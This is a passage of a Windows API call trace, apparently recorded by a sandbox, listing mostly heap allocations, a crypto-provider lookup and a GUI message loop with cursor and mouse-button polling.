(in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83658 | out: hHeap=0xc60000) returned 1 [0264.487] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17e0 | out: hHeap=0xc60000) returned 1 [0264.487] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83658 [0264.487] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17e0 [0264.487] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83670 [0264.487] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17e0 | out: hHeap=0xc60000) returned 1 [0264.487] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81120 [0264.487] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17e0 [0264.487] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83628 [0264.487] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17e0 | out: hHeap=0xc60000) returned 1 [0264.487] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83640 [0264.487] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17e0 [0264.487] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe810f0 [0264.487] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17e0 | out: hHeap=0xc60000) returned 1 [0264.487] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe835f8 [0264.487] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17e0 [0264.487] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17e0 | out: hHeap=0xc60000) returned 1 [0264.487] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83610 [0264.488] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17e0 [0264.488] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe810c0 [0264.488] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17e0 | out: hHeap=0xc60000) returned 1 [0264.488] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe835c8 [0264.488] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17e0 [0264.488] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17e0 | out: hHeap=0xc60000) returned 1 [0264.488] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe835e0 [0264.488] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17e0 [0264.488] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81090 [0264.488] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17e0 | out: hHeap=0xc60000) returned 1 [0264.488] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c880 [0264.488] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb5c0 | out: hHeap=0xc60000) returned 1 [0264.488] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83598 [0264.488] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17e0 [0264.488] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17e0 | out: hHeap=0xc60000) returned 1 [0264.488] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe835b0 [0264.488] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17e0 [0264.488] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81060 [0264.488] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17e0 | out: hHeap=0xc60000) returned 1 [0264.488] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83568 [0264.488] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17e0 [0264.489] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17e0 | out: hHeap=0xc60000) returned 1 [0264.489] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83580 [0264.489] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17e0 [0264.489] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81030 [0264.489] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17e0 | out: hHeap=0xc60000) returned 1 [0264.489] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83538 [0264.489] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17e0 [0264.489] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17e0 | out: hHeap=0xc60000) returned 1 [0264.489] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17e0 [0264.489] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83550 [0264.489] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.489] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81000 [0264.489] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17d0 [0264.489] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17c0 [0264.489] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83508 [0264.489] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81000 | out: hHeap=0xc60000) returned 1 [0264.489] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17d0 | out: hHeap=0xc60000) returned 1 [0264.489] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83508 | out: hHeap=0xc60000) returned 1 [0264.489] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17c0 | out: hHeap=0xc60000) returned 1 [0264.489] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb5c0 [0264.490] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17c0 [0264.490] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83508 [0264.490] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17d0 [0264.490] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17b0 [0264.490] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81000 [0264.490] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83508 | out: hHeap=0xc60000) returned 1 [0264.490] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17d0 | out: hHeap=0xc60000) returned 1 [0264.490] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81000 | out: hHeap=0xc60000) returned 1 [0264.490] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17b0 | out: hHeap=0xc60000) returned 1 [0264.490] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17b0 [0264.490] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81000 [0264.490] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17d0 [0264.490] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17a0 [0264.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83508 [0264.491] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81000 | out: hHeap=0xc60000) returned 1 [0264.491] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17d0 | out: hHeap=0xc60000) returned 1 [0264.491] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83508 | out: hHeap=0xc60000) returned 1 [0264.491] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17a0 | out: hHeap=0xc60000) returned 1 [0264.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17a0 [0264.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83508 [0264.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17d0 [0264.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1790 [0264.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81000 [0264.491] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83508 | out: hHeap=0xc60000) returned 1 [0264.491] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17d0 | out: hHeap=0xc60000) returned 1 [0264.491] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81000 | out: hHeap=0xc60000) returned 1 [0264.491] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1790 | out: hHeap=0xc60000) returned 1 [0264.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1790 [0264.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81000 [0264.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17d0 [0264.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1780 [0264.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83508 [0264.491] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81000 | out: hHeap=0xc60000) returned 1 [0264.491] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17d0 | out: hHeap=0xc60000) returned 1 [0264.492] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83508 | out: hHeap=0xc60000) returned 1 [0264.492] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1780 | out: hHeap=0xc60000) returned 1 [0264.492] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1780 [0264.492] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83508 [0264.492] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17d0 [0264.492] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1770 [0264.492] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81000 [0264.492] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83508 | out: hHeap=0xc60000) returned 1 [0264.492] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17d0 | out: hHeap=0xc60000) returned 1 [0264.492] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81000 | out: hHeap=0xc60000) returned 1 [0264.492] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1770 | out: hHeap=0xc60000) returned 1 [0264.493] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81000 [0264.493] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1770 [0264.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0264.493] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x14) returned 0xeca7f8 [0264.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0xeca7f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0264.493] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81000 | out: hHeap=0xc60000) returned 1 [0264.493] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb5e8 [0264.493] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca7f8 | out: hHeap=0xc60000) returned 1 [0264.493] GetProcAddress (hModule=0x74f20000, lpProcName="CryptAcquireContext") returned 0x0 [0264.493] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb5e8 | out: hHeap=0xc60000) returned 1 [0264.493] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1770 | out: hHeap=0xc60000) returned 1 [0264.493] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1770 [0264.494] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xee0cb8 [0264.494] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81000 [0264.494] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17d0 [0264.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0264.494] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x15) returned 0xeca7f8 [0264.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0xeca7f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0264.494] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81000 | out: hHeap=0xc60000) returned 1 [0264.494] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb5e8 [0264.494] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca7f8 | out: hHeap=0xc60000) returned 1 [0264.495] GetProcAddress (hModule=0x74f20000, lpProcName="CryptAcquireContextA") returned 0x74f291dd [0264.495] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb5e8 | out: hHeap=0xc60000) returned 1 [0264.495] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17d0 | out: hHeap=0xc60000) returned 1 [0264.495] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0cb8 | out: hHeap=0xc60000) returned 1 [0264.495] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1770 | out: hHeap=0xc60000) returned 1 [0264.495] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb5e8 [0264.495] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1770 [0264.495] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17d0 [0264.495] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1760 [0264.495] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1750 [0264.495] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1740 [0264.495] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1770 | out: hHeap=0xc60000) returned 1 [0264.495] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17d0 | out: hHeap=0xc60000) returned 1 [0264.496] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1760 | out: hHeap=0xc60000) returned 1 [0264.496] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1750 | out: hHeap=0xc60000) returned 1 [0264.496] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1740 | out: hHeap=0xc60000) returned 1 [0264.496] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb5e8 | out: hHeap=0xc60000) returned 1 [0264.511] CryptAcquireContextA (in: phProv=0x91f1d8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x91f1d8*=0xcc72b8) returned 1 [0264.536] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1750 [0264.538] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x214) returned 0xca7380 [0264.538] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xeca7d8 [0264.538] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81000 [0264.538] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83508 [0264.538] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83520 [0264.538] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1760 [0264.539] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83520 | out: hHeap=0xc60000) returned 1 [0264.539] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1760 | out: hHeap=0xc60000) returned 1 [0264.539] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83508 | out: hHeap=0xc60000) returned 1 [0264.539] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83508 [0264.539] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83520 [0264.539] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80fd0 [0264.539] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1760 [0264.540] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80fd0 | out: hHeap=0xc60000) returned 1 [0264.540] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1760 | out: hHeap=0xc60000) returned 1 [0264.540] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83520 | out: hHeap=0xc60000) returned 1 [0264.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83520 [0264.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80fd0 [0264.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe834d8 [0264.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1760 [0264.540] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834d8 | out: hHeap=0xc60000) returned 1 [0264.540] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1760 | out: hHeap=0xc60000) returned 1 [0264.540] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80fd0 | out: hHeap=0xc60000) returned 1 [0264.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80fd0 [0264.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe834d8 [0264.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe834f0 [0264.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1760 [0264.541] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834f0 | out: hHeap=0xc60000) returned 1 [0264.541] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1760 | out: hHeap=0xc60000) returned 1 [0264.541] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834d8 | out: hHeap=0xc60000) returned 1 [0264.542] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe834d8 [0264.542] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe834f0 [0264.542] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80fa0 [0264.542] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1760 [0264.542] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80fa0 | out: hHeap=0xc60000) returned 1 [0264.542] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1760 | out: hHeap=0xc60000) returned 1 [0264.543] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834f0 | out: hHeap=0xc60000) returned 1 [0264.543] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe834f0 [0264.543] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80fa0 [0264.543] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe834a8 [0264.543] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1760 [0264.543] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834a8 | out: hHeap=0xc60000) returned 1 [0264.544] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1760 | out: hHeap=0xc60000) returned 1 [0264.544] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80fa0 | out: hHeap=0xc60000) returned 1 [0264.545] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17c0 | out: hHeap=0xc60000) returned 1 [0264.545] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17b0 | out: hHeap=0xc60000) returned 1 [0264.545] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17a0 | out: hHeap=0xc60000) returned 1 [0264.545] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1790 | out: hHeap=0xc60000) returned 1 [0264.545] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1780 | out: hHeap=0xc60000) returned 1 [0264.545] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb5c0 | out: hHeap=0xc60000) returned 1 [0264.546] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83550 | out: hHeap=0xc60000) returned 1 [0264.546] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17e0 | out: hHeap=0xc60000) returned 1 [0264.546] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81150 | out: hHeap=0xc60000) returned 1 [0264.547] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83670 | out: hHeap=0xc60000) returned 1 [0264.547] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83658 | out: hHeap=0xc60000) returned 1 [0264.547] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83628 | out: hHeap=0xc60000) returned 1 [0264.548] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81120 | out: hHeap=0xc60000) returned 1 [0264.548] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe810f0 | out: hHeap=0xc60000) returned 1 [0264.548] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83640 | out: hHeap=0xc60000) returned 1 [0264.548] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe835f8 | out: hHeap=0xc60000) returned 1 [0264.548] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe810c0 | out: hHeap=0xc60000) returned 1 [0264.548] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83610 | out: hHeap=0xc60000) returned 1 [0264.548] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe835c8 | out: hHeap=0xc60000) returned 1 [0264.548] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81090 | out: hHeap=0xc60000) returned 1 [0264.549] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe835e0 | out: hHeap=0xc60000) returned 1 [0264.549] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83598 | out: hHeap=0xc60000) returned 1 [0264.549] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81060 | out: hHeap=0xc60000) returned 1 [0264.549] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe835b0 | out: hHeap=0xc60000) returned 1 [0264.549] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83568 | out: hHeap=0xc60000) returned 1 [0264.549] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81030 | out: hHeap=0xc60000) returned 1 [0264.549] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83580 | out: hHeap=0xc60000) returned 1 [0264.549] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83538 | out: hHeap=0xc60000) returned 1 [0264.551] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c880 | out: hHeap=0xc60000) returned 1 [0264.551] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17f0 | out: hHeap=0xc60000) returned 1 [0264.551] PeekMessageW (in: lpMsg=0x91f854, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f854) returned 1 [0264.551] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91f854) returned 0 [0264.551] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91f854) returned 1 [0264.554] PeekMessageW (in: lpMsg=0x91f854, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f854) returned 1 [0264.554] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91f854) returned 0 [0264.554] TranslateMessage (lpMsg=0x91f854) returned 0 [0264.555] DispatchMessageW (lpMsg=0x91f854) returned 0x0 [0264.555] GetForegroundWindow () returned 0x80170 [0264.555] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.555] GetCursorPos (in: lpPoint=0x91f690 | out: lpPoint=0x91f690*(x=890, y=510)) returned 1 [0264.555] ScreenToClient (in: hWnd=0x80170, lpPoint=0x91f690 | out: lpPoint=0x91f690) returned 1 [0264.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x24) returned 0xe90618 [0264.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83538 [0264.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17f0 [0264.568] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17e0 [0264.569] GetAsyncKeyState (vKey=1) returned 0 [0264.569] GetAsyncKeyState (vKey=2) returned 0 [0264.569] PeekMessageW (in: lpMsg=0x91f854, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f854) returned 1 [0264.569] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91f854) returned 0 [0264.569] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91f854) returned 0 [0264.570] TranslateMessage (lpMsg=0x91f854) returned 0 [0264.570] DispatchMessageW (lpMsg=0x91f854) returned 0x0 [0264.570] PeekMessageW (in: lpMsg=0x91f854, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f854) returned 0 [0264.570] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1780 [0264.570] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xca75a8 [0264.570] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1790 [0264.570] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca75a8 | out: hHeap=0xc60000) returned 1 [0264.570] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, 